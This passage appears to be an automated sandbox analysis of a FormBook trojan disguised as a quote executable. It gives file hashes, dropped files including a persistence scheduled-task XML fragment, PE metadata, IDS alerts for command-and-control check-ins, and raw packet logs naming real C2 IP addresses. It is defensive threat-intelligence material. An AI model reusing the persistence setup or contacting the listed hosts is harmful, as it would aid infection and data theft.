                                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                  C:\Users\user\AppData\Local\Temp\tmpC686.tmp
                                                                                  Process:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1647
                                                                                  Entropy (8bit):5.196941758831155
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGfQH0tn:cbhK79lNQR/rydbz9I3YODOLNdq39S
                                                                                  MD5:9426325041983C4CC3F7271D52356276
                                                                                  SHA1:5F6E0AC8C1D9A3816D84F17BCCA7D885B4261E7C
                                                                                  SHA-256:BA2BC8361FC1F911D12B6A54D87050AA783ACD1709BAFAFD4920928ACF9724E2
                                                                                  SHA-512:DD553CBBE3A9EC43EF90EE35E053199E271F91FB4E11E427AD62F316FBCF5D5B8F6879A2CD8C5A4DFE137A1A2131053A080BBD79BEC448062C9FC1BE8467708A
                                                                                  Malicious:true
                                                                                  Reputation:low
                                                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                  C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe
                                                                                  Process:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):946176
                                                                                  Entropy (8bit):7.132053571073816
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:8/B3tSWICzUOwH77vvgdLZnHVTT+7/ypuUkCF/CgI2W1+4DXqu7IgD:8/BdSbjveZnHVjpNZS11Dq
                                                                                  MD5:1685762EB9EB252F560A5E7A33F78EF1
                                                                                  SHA1:8069EF4B521B80772E3AF6D7E5FD162F824D2C96
                                                                                  SHA-256:33C5A410D6AC03A18A033A6162B958EFEC61A9AB0CAF991ECF6BC3A7D0AE0528
                                                                                  SHA-512:BBA3D35BB553B98F75BB522A3F073E00D7A02EE00C69AA4513917B3E291267B58394C1D46E4B781EECB4034BBA821595B1691945A1CDF26A019A4944D668ADDF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 15%
                                                                                  Reputation:low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..`..............P.................. ........@.. ....................................@.................................P...O.......H............................................................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc...............n..............@..B........................H........|..$............C...............................................0............(,...(-.........(.....o.....*.....................(/......(0......(1......(2......(3....*N..(....oz...(4....*&..(5....*.s6........s7........s8........s9........s:........*....0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0...........~....o?....+..*&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....
                                                                                  C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exe:Zone.Identifier
                                                                                  Process:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.132053571073816
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:quote20210126.exe.exe
                                                                                  File size:946176
                                                                                  MD5:1685762eb9eb252f560a5e7a33f78ef1
                                                                                  SHA1:8069ef4b521b80772e3af6d7e5fd162f824d2c96
                                                                                  SHA256:33c5a410d6ac03a18a033a6162b958efec61a9ab0caf991ecf6bc3a7d0ae0528
                                                                                  SHA512:bba3d35bb553b98f75bb522a3f073e00d7a02ee00c69aa4513917b3e291267b58394c1d46e4b781eecb4034bba821595b1691945a1cdf26a019a4944d668addf
                                                                                  SSDEEP:12288:8/B3tSWICzUOwH77vvgdLZnHVTT+7/ypuUkCF/CgI2W1+4DXqu7IgD:8/BdSbjveZnHVjpNZS11Dq
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..`..............P.................. ........@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:0000000000000000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4cf2a2
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x600FAE70 [Tue Jan 26 05:53:52 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xcf2500x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x19748.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xcd2a80xcd400False0.756890653548data7.59078944089IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xd00000x197480x19800False0.0603458180147data1.01370219862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xea0000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0xd01a00x468GLS_BINARY_LSB_FIRST
                                                                                  RT_ICON0xd06180xa19PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced
                                                                                  RT_ICON0xd10440x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                                  RT_ICON0xd35fc0x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                                  RT_ICON0xd46b40x10828dBase III DBT, version number 0, next free block index 40
                                                                                  RT_ICON0xe4eec0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                                  RT_GROUP_ICON0xe91240x5adata
                                                                                  RT_VERSION0xe91900x3b6data
                                                                                  RT_MANIFEST0xe95580x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Version Infos

                                                                                  DescriptionData
                                                                                  Translation0x0000 0x04b0
                                                                                  LegalCopyrightCopyright 2017 ValidOn
                                                                                  Assembly Version4.88.0.3
                                                                                  InternalNameBase64FormattingOptions.exe
                                                                                  FileVersion4.8.0.3
                                                                                  CompanyNameValidOn Limited
                                                                                  LegalTrademarks
                                                                                  CommentsGCLatency Mode
                                                                                  ProductNameGCLatency Mode
                                                                                  ProductVersion4.8.0.3
                                                                                  FileDescriptionGCLatency Mode
                                                                                  OriginalFilenameBase64FormattingOptions.exe

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  01/27/21-03:17:50.229367TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4198.49.23.144
                                                                                  01/27/21-03:17:50.229367TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4198.49.23.144
                                                                                  01/27/21-03:17:50.229367TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4198.49.23.144
                                                                                  01/27/21-03:18:29.215279TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.470.40.220.182
                                                                                  01/27/21-03:18:29.215279TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.470.40.220.182
                                                                                  01/27/21-03:18:29.215279TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.470.40.220.182
                                                                                  01/27/21-03:20:34.217921TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.434.102.136.180
                                                                                  01/27/21-03:20:34.217921TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.434.102.136.180
                                                                                  01/27/21-03:20:34.217921TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.434.102.136.180
                                                                                  01/27/21-03:20:34.334295TCP1201ATTACK-RESPONSES 403 Forbidden804976934.102.136.180192.168.2.4
                                                                                  01/27/21-03:23:25.598914TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978180192.168.2.4198.49.23.144
                                                                                  01/27/21-03:23:25.598914TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978180192.168.2.4198.49.23.144
                                                                                  01/27/21-03:23:25.598914TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978180192.168.2.4198.49.23.144
                                                                                  01/27/21-03:24:04.492933TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.470.40.220.182
                                                                                  01/27/21-03:24:04.492933TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.470.40.220.182
                                                                                  01/27/21-03:24:04.492933TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978380192.168.2.470.40.220.182
                                                                                  01/27/21-03:26:12.920210TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978880192.168.2.434.102.136.180
                                                                                  01/27/21-03:26:12.920210TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978880192.168.2.434.102.136.180
                                                                                  01/27/21-03:26:12.920210TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978880192.168.2.434.102.136.180
                                                                                  01/27/21-03:26:13.037230TCP1201ATTACK-RESPONSES 403 Forbidden804978834.102.136.180192.168.2.4

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 27, 2021 03:17:26.942982912 CET4975980192.168.2.4192.155.181.96
                                                                                  Jan 27, 2021 03:17:29.952366114 CET4975980192.168.2.4192.155.181.96
                                                                                  Jan 27, 2021 03:17:35.968414068 CET4975980192.168.2.4192.155.181.96
                                                                                  Jan 27, 2021 03:17:49.956367016 CET4976080192.168.2.4192.155.181.96
                                                                                  Jan 27, 2021 03:17:50.098257065 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.228882074 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.229062080 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.229367018 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.359977007 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362356901 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362384081 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362401009 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362412930 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362425089 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362443924 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362462044 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362477064 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362492085 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362508059 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.362639904 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.362725973 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.362907887 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.494811058 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494838953 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494852066 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494863033 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494873047 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494884014 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494894981 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494905949 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494916916 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494926929 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494941950 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494952917 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494963884 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494975090 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494985104 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.494996071 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.495007038 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.495023012 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.495033026 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.495054960 CET8049761198.49.23.144192.168.2.4
                                                                                  Jan 27, 2021 03:17:50.495095968 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:50.495254993 CET4976180192.168.2.4198.49.23.144
                                                                                  Jan 27, 2021 03:17:52.969861984 CET4976080192.168.2.4192.155.181.96
                                                                                  Jan 27, 2021 03:17:58.970407963 CET4976080192.168.2.4192.155.181.96
                                                                                  Jan 27, 2021 03:18:29.018718004 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:29.179402113 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:29.181127071 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:29.215279102 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:29.376688004 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:29.707766056 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:29.909008026 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.111861944 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.111944914 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.111978054 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112015009 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112056017 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112096071 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112144947 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112147093 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:31.112190962 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112231970 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112252951 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:31.112270117 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:31.112274885 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:31.112277031 CET804976470.40.220.182192.168.2.4
                                                                                  Jan 27, 2021 03:18:31.112303019 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:31.112360954 CET4976480192.168.2.470.40.220.182
                                                                                  Jan 27, 2021 03:18:50.393065929 CET4976580192.168.2.442.194.179.169
                                                                                  Jan 27, 2021 03:18:53.396769047 CET4976580192.168.2.442.194.179.169
                                                                                  Jan 27, 2021 03:18:59.397339106 CET4976580192.168.2.442.194.179.169
                                                                                  Jan 27, 2021 03:19:12.511153936 CET4976680192.168.2.442.194.179.169
                                                                                  Jan 27, 2021 03:19:13.469610929 CET4976780192.168.2.4107.180.2.197
                                                                                  Jan 27, 2021 03:19:13.579983950 CET8049767107.180.2.197192.168.2.4
                                                                                  Jan 27, 2021 03:19:13.580079079 CET4976780192.168.2.4107.180.2.197
                                                                                  Jan 27, 2021 03:19:13.580223083 CET4976780192.168.2.4107.180.2.197
                                                                                  Jan 27, 2021 03:19:13.690579891 CET8049767107.180.2.197192.168.2.4
                                                                                  Jan 27, 2021 03:19:14.070446014 CET4976780192.168.2.4107.180.2.197
                                                                                  Jan 27, 2021 03:19:14.244519949 CET8049767107.180.2.197192.168.2.4
                                                                                  Jan 27, 2021 03:19:14.613950014 CET8049767107.180.2.197192.168.2.4
                                                                                  Jan 27, 2021 03:19:14.613972902 CET8049767107.180.2.197192.168.2.4
                                                                                  Jan 27, 2021 03:19:14.614012957 CET4976780192.168.2.4107.180.2.197
                                                                                  Jan 27, 2021 03:19:14.614048958 CET4976780192.168.2.4107.180.2.197
                                                                                  Jan 27, 2021 03:19:15.523726940 CET4976680192.168.2.442.194.179.169
                                                                                  Jan 27, 2021 03:19:21.524118900 CET4976680192.168.2.442.194.179.169
                                                                                  Jan 27, 2021 03:19:53.266285896 CET4976880192.168.2.4150.95.52.72
                                                                                  Jan 27, 2021 03:19:53.522756100 CET8049768150.95.52.72192.168.2.4
                                                                                  Jan 27, 2021 03:19:53.523087025 CET4976880192.168.2.4150.95.52.72
                                                                                  Jan 27, 2021 03:19:53.523443937 CET4976880192.168.2.4150.95.52.72
                                                                                  Jan 27, 2021 03:19:53.781168938 CET8049768150.95.52.72192.168.2.4
                                                                                  Jan 27, 2021 03:19:53.782124043 CET8049768150.95.52.72192.168.2.4
                                                                                  Jan 27, 2021 03:19:53.782161951 CET8049768150.95.52.72192.168.2.4
                                                                                  Jan 27, 2021 03:19:53.782473087 CET4976880192.168.2.4150.95.52.72
                                                                                  Jan 27, 2021 03:19:53.782521963 CET4976880192.168.2.4150.95.52.72
                                                                                  Jan 27, 2021 03:19:54.041800022 CET8049768150.95.52.72192.168.2.4
                                                                                  Jan 27, 2021 03:20:34.199644089 CET4976980192.168.2.434.102.136.180
                                                                                  Jan 27, 2021 03:20:34.217567921 CET804976934.102.136.180192.168.2.4
                                                                                  Jan 27, 2021 03:20:34.217746973 CET4976980192.168.2.434.102.136.180
                                                                                  Jan 27, 2021 03:20:34.217921019 CET4976980192.168.2.434.102.136.180

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 27, 2021 03:16:19.438462973 CET6315353192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:19.456213951 CET53631538.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:20.241821051 CET5299153192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:20.260512114 CET53529918.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:22.535990953 CET5370053192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:22.554610014 CET53537008.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:23.567126989 CET5172653192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:23.583062887 CET53517268.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:24.215102911 CET5679453192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:24.231293917 CET53567948.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:28.231518030 CET5653453192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:28.247030973 CET53565348.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:29.162794113 CET5662753192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:29.178057909 CET53566278.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:30.163014889 CET5662153192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:30.179218054 CET53566218.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:31.302753925 CET6311653192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:31.319257021 CET53631168.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:32.267466068 CET6407853192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:32.283164024 CET53640788.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:33.313215971 CET6480153192.168.2.48.8.8.8
                                                                                  Jan 27, 2021 03:16:33.330498934 CET53648018.8.8.8192.168.2.4
                                                                                  Jan 27, 2021 03:16:34.546786070 CET6172153192.168.2.48.8.8.8
